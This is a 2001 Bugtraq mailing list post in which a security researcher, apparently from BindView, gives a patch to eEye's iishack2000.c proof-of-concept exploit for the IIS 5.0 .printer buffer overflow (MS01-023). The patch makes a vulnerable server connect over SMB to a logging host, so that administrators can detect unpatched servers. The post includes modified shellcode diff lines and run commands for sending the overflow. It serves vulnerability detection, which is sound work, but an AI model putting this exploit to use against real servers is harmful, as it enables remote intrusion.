Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Windows 2000 .printer remote overflow proof of concept exploit

From: Matt Power <mhpower () BOS BINDVIEW COM>
Date: Thu, 3 May 2001 00:28:58 -0400
       ... , will create a file called www.eEye.com.txt on the root of
drive c.
                ... This proof of concept exploit is not to be used as a
method of testing to see if your vulnerable or not.


In some environments, security staff may be responsible for
identifying which IIS 5.0 servers, out of a large collection of them,
still do not have a fix in place for this vulnerability. The security
staff may not have any convenient way to check for the existence of
c:\www.eEye.com.txt on every server, and thus a proof-of-concept
exploit that provides a result observable over the network may be of
interest. One possibility, which involves only minor changes to the
code provided by eEye Digital Security, is to try to get the IIS 5.0
system to access a UNC share on a system controlled by the security
staff. I've appended a patch to iishack2000.c that implements this.

To use this, first obtain the original iishack2000.c from

  http://www.eeye.com/html/research/Advisories/iishack2000.c

The MD5 checksum of this is 1e8f76209ee0afaa7b6625a8ace48535. Then,
remove the control-M characters, e.g.,

  tr -d '\015' < iishack2000.c > iishack2000.c.tr; mv iishack2000.c.tr iishack2000.c

The MD5 checksum should then be c93b4d9040723fb03c6860a023f6df2b, and
the patch below can then be applied.

Example: the security staff operate a machine 10.0.0.1 that has some
way of logging any packets sent to it on tcp ports 139 and 445
(ipchains, IP Filter, etc.), and which normally sees no traffic on
those ports. The machine 10.0.0.2 is one of a large number of IIS 5.0
servers that might still have the MS01-023 vulnerability. The setup of
10.0.0.2 allows it to send SMB requests to 10.0.0.1, even though it
normally would not do so. The security staff run this program, e.g.,

  % iishack2000 10.0.0.2 80 0 10.0.0.1
  % iishack2000 10.0.0.2 80 1 10.0.0.1

and then look at the packet log files. If there are packets from
10.0.0.2 to 10.0.0.1 on tcp ports 139 or 445, then 10.0.0.2 is almost
certainly vulnerable. Otherwise, no evidence of a vulnerability has
been found.

Presumably more efficient methods will become available later, but
this one may be of interest since many organizations need to check
their IIS 5.0 servers now.

(Incidentally, I've tried the webexplt.pl recently posted by Wanderley
J. Abreu Jr., and for me it reports "The Machine tested has the IPP
Vulnerability!" on machines that have Microsoft's Q296576 patch.)

Matt Power
BindView Corporation, RAZOR Team
mhpower () bos bindview com


*** iishack2000.c.old   Wed May  2 23:58:17 2001
--- iishack2000.c       Wed May  2 23:58:17 2001
***************
*** 86,89 ****
  {
!       char request_message[500];
!       int X,sock,sp=0;
        unsigned short serverport=htons(80);
--- 86,89 ----
  {
!       char ip[16],request_message[500],unc[20];
!       int X,i,len,sock,sp=0;
        unsigned short serverport=htons(80);
***************
*** 101,103 ****
        printf("Exploit by Ryan Permeh <ryan () eeye com>\n");
!       if(argc < 4) usage();
        if(argv[1] != NULL)
--- 101,103 ----
        printf("Exploit by Ryan Permeh <ryan () eeye com>\n");
!       if(argc < 5) usage();
        if(argv[1] != NULL)
***************
*** 116,118 ****
        }       
!       printf("Sending string to overflow sp %d for host: %s on port:%d\n",sp,inet_ntoa(attack),htons(serverport));
        memset(request_message,0x00,500);
--- 116,142 ----
        }       
!       if(argv[4] != NULL && strlen(argv[4]) <= 15)
!       {
!               strcpy(ip, argv[4]);
!               strcpy(&unc[2], argv[4]);
!               len = strlen(argv[4]);
!       }
!       else
!       {
!               strcpy(ip, "127.0.0.1");
!               strcpy(&unc[2], "127.0.0.1");
!               len = strlen("127.0.0.1");
!       }
!       unc[0] = '\\';
!       unc[1] = '\\';
!       unc[len + 2] = '\\';
!       for (i = 0; i < 16 - len; ++i)
!       {
!               unc[len + 3 + i] = 'A';
!       }
!       unc[19] = '\0';
!       for (i = 146; i <= 164; ++i)
!       {
!               sc[sp][i] = unc[i - 146] ^ 3;
!       }
!       printf("Sending string to overflow sp %d for host: %s on port:%d and contact 
%s\n",sp,inet_ntoa(attack),htons(serverport),ip);
        memset(request_message,0x00,500);
***************
*** 128,131 ****
                send(sock,request_message,strlen(request_message)*sizeof(char),0);
!               printf("Sent overflow, now look on the c: drive of %s for www.eEye.com.txt\n",inet_ntoa(attack));
!               printf("If the file doesn't exist, the server may be patched,\nor may be a different service pack (try 
again with %d as the service pack)\n",sp==0?1:0);                
        }
--- 152,155 ----
                send(sock,request_message,strlen(request_message)*sizeof(char),0);
!               printf("Sent overflow, now look at logs on %s for SMB packets from %s\n",ip,inet_ntoa(attack));
!               printf("If no packets were logged, the server may be patched,\nor may be a different service pack (try 
again with %d as the service pack)\n",sp==0?1:0);                
        }
***************
*** 144,148 ****
  {
!       printf("Syntax:  iishack2000 <hostname> <server port> <service pack>\n");
!       printf("Example: iishack2000 127.0.0.1 80 0\n");
!       printf("Example: iishack2000 127.0.0.1 80 1\n");        
        exit(1);
--- 168,172 ----
  {
!       printf("Syntax:  iishack2000 <hostname> <server port> <service pack> <log host>\n");
!       printf("Example: iishack2000 127.0.0.1 80 0 10.0.0.1\n");
!       printf("Example: iishack2000 127.0.0.1 80 1 10.0.0.1\n");       
        exit(1);
Previous By Date Next
Previous By Thread Next

Current thread: